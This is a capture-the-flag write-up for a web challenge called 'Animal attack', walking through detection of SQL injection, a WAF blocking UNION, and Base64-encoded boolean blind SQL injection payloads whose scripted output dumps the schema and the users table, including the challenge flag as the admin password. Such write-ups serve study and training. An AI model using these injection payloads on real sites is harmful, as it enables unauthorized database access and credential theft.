CTFtime.org

Animal attack

by kazkiti / PwnaSonic

Tags: web sqli 

Rating: 5.0

# ▼▼▼Animal attack (200pts)(115/607=18.9%)▼▼▼
**This writeup is written by [@kazkiti_ctf](https://twitter.com/kazkiti_ctf)**

```
Animals have taken over our world and a specific team of animal spies have taken the role of leading the entire army of animals. We humans have formed a group of rebels who have taken it up as a mission to find the main users of the animal spies and find the admin of that group. The admin, with his username and password can launch a powerful attack on the humans. Help the human rebels group get the world back from the animals.

The portal is available at :- http://128.199.224.175:24000/
```

---

**【Information gathering】**

'(single quart) Insert 1

```
You queried for : '
Sorry, we couldn't find any agent with the given name!
```

''(single quart) Insert 2

```
You queried for : ''
```

'''(single quart) Insert 3

```
You queried for : '''
Sorry, we couldn't find any agent with the given name!
```

''''(single quart) Insert 4

```
You queried for : ''''
```

SQL injection is possible !!

※In case of SQL error, it seems that error handling is done.

---

**【Identification of DB】**

`'or''=''#`

Since it is a normal response, it is confirmed that it is `MySQL`

---

【Try1: UNION based SQL Injection】

`'UNION SELECT 1#`

`Oooh !! We got a HACKER over here ...`

I inserted only UNION, but UNION seems to be detected by WAF.

---

**【Try2:Blind SQL Injection】**

`0'or'1'='1'#` ⇒ Show all

`0'or'1'='0'#` ⇒ no display

Blind SQL injection is possible !!

---

Insert ● = 1 ~, ▲ = 32 ~ 126 as below and extract data using Binary Search

Encode and transmit the following as `Base64`

`0'or ord(substr((select group_concat(table_name,":",column_name) from information_schema.columns where table_schema=database()),●,1))>▲-- `

```
$ python BlindSql.py
s
sp
spi
spie
spies
spies:
spies:i
spies:id
spies:id,
spies:id,s
spies:id,sp
spies:id,spi
spies:id,spie
spies:id,spies
spies:id,spies:
spies:id,spies:n
spies:id,spies:na
spies:id,spies:nam
spies:id,spies:name
spies:id,spies:name,
spies:id,spies:name,s
spies:id,spies:name,sp
spies:id,spies:name,spi
spies:id,spies:name,spie
spies:id,spies:name,spies
spies:id,spies:name,spies:
spies:id,spies:name,spies:a
spies:id,spies:name,spies:ag
spies:id,spies:name,spies:age
spies:id,spies:name,spies:age,
spies:id,spies:name,spies:age,s
spies:id,spies:name,spies:age,sp
spies:id,spies:name,spies:age,spi
spies:id,spies:name,spies:age,spie
spies:id,spies:name,spies:age,spies
spies:id,spies:name,spies:age,spies:
spies:id,spies:name,spies:age,spies:e
spies:id,spies:name,spies:age,spies:ex
spies:id,spies:name,spies:age,spies:exp
spies:id,spies:name,spies:age,spies:expe
spies:id,spies:name,spies:age,spies:exper
spies:id,spies:name,spies:age,spies:experi
spies:id,spies:name,spies:age,spies:experie
spies:id,spies:name,spies:age,spies:experien
spies:id,spies:name,spies:age,spies:experienc
spies:id,spies:name,spies:age,spies:experience
spies:id,spies:name,spies:age,spies:experience,
spies:id,spies:name,spies:age,spies:experience,s
spies:id,spies:name,spies:age,spies:experience,sp
spies:id,spies:name,spies:age,spies:experience,spi
spies:id,spies:name,spies:age,spies:experience,spie
spies:id,spies:name,spies:age,spies:experience,spies
spies:id,spies:name,spies:age,spies:experience,spies:
spies:id,spies:name,spies:age,spies:experience,spies:d
spies:id,spies:name,spies:age,spies:experience,spies:de
spies:id,spies:name,spies:age,spies:experience,spies:des
spies:id,spies:name,spies:age,spies:experience,spies:desc
spies:id,spies:name,spies:age,spies:experience,spies:descr
spies:id,spies:name,spies:age,spies:experience,spies:descri
spies:id,spies:name,spies:age,spies:experience,spies:descrip
spies:id,spies:name,spies:age,spies:experience,spies:descript
spies:id,spies:name,spies:age,spies:experience,spies:descripti
spies:id,spies:name,spies:age,spies:experience,spies:descriptio
spies:id,spies:name,spies:age,spies:experience,spies:description
spies:id,spies:name,spies:age,spies:experience,spies:description,
spies:id,spies:name,spies:age,spies:experience,spies:description,u
spies:id,spies:name,spies:age,spies:experience,spies:description,us
spies:id,spies:name,spies:age,spies:experience,spies:description,use
spies:id,spies:name,spies:age,spies:experience,spies:description,user
spies:id,spies:name,spies:age,spies:experience,spies:description,users
spies:id,spies:name,spies:age,spies:experience,spies:description,users:
spies:id,spies:name,spies:age,spies:experience,spies:description,users:i
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,u
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,us
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,use
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,user
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:u
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:us
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:use
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:user
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:usern
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:userna
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:usernam
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:username
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:username,
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:username,u
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:username,us
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:username,use
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:username,user
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:username,users
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:username,users:
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:username,users:p
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:username,users:pa
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:username,users:pas
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:username,users:pass
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:username,users:passw
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:username,users:passwo
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:username,users:passwor
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:username,users:password
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:username,users:password,
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:username,users:password,u
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:username,users:password,us
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:username,users:password,use
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:username,users:password,user
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:username,users:password,users
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:username,users:password,users:
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:username,users:password,users:e
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:username,users:password,users:em
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:username,users:password,users:ema
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:username,users:password,users:emai
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:username,users:password,users:email
spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:username,users:password,users:email
```

---

Similarly, extract data from the users table

`0'or ord(substr((select group_concat(id,":",username,":",password,":",email) from users),●,1))>▲-- `

```
$ python BlindSql.py
1
1:
1:a
1:ad
1:adm
1:admi
1:admin
1:admin:
1:admin:p
1:admin:pc
1:admin:pct
1:admin:pctf
1:admin:pctf{
1:admin:pctf{L
1:admin:pctf{L3
1:admin:pctf{L31
1:admin:pctf{L31'
1:admin:pctf{L31's
1:admin:pctf{L31's~
1:admin:pctf{L31's~@
1:admin:pctf{L31's~@L
1:admin:pctf{L31's~@Ll
1:admin:pctf{L31's~@Ll_
1:admin:pctf{L31's~@Ll_h
1:admin:pctf{L31's~@Ll_h4
1:admin:pctf{L31's~@Ll_h4i
1:admin:pctf{L31's~@Ll_h4il
1:admin:pctf{L31's~@Ll_h4il-
1:admin:pctf{L31's~@Ll_h4il-1
1:admin:pctf{L31's~@Ll_h4il-1h
1:admin:pctf{L31's~@Ll_h4il-1h3
1:admin:pctf{L31's~@Ll_h4il-1h3-
1:admin:pctf{L31's~@Ll_h4il-1h3-c
1:admin:pctf{L31's~@Ll_h4il-1h3-c4
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Q
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu3
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:s
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:sp
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:spy
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:spy_
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:spy_a
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:spy_ad
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:spy_adm
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:spy_admi
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:spy_admin
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:spy_admin@
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:spy_admin@a
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:spy_admin@ad
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:spy_admin@adm
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:spy_admin@admi
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:spy_admin@admin
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:spy_admin@admin.
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:[email protected]
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:[email protected]
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:[email protected]
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:[email protected],
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:[email protected],2
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:[email protected],2:
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:[email protected],2:t
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:[email protected],2:te
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:[email protected],2:tes
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:[email protected],2:test
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:[email protected],2:test:
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:[email protected],2:test:t
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:[email protected],2:test:te
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:[email protected],2:test:tes
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:[email protected],2:test:test
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:[email protected],2:test:test:
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:[email protected],2:test:test:t
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:[email protected],2:test:test:te
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:[email protected],2:test:test:tes
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:[email protected],2:test:test:test
1:admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}:[email protected],2:test:test:test
```

`pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}`

Comments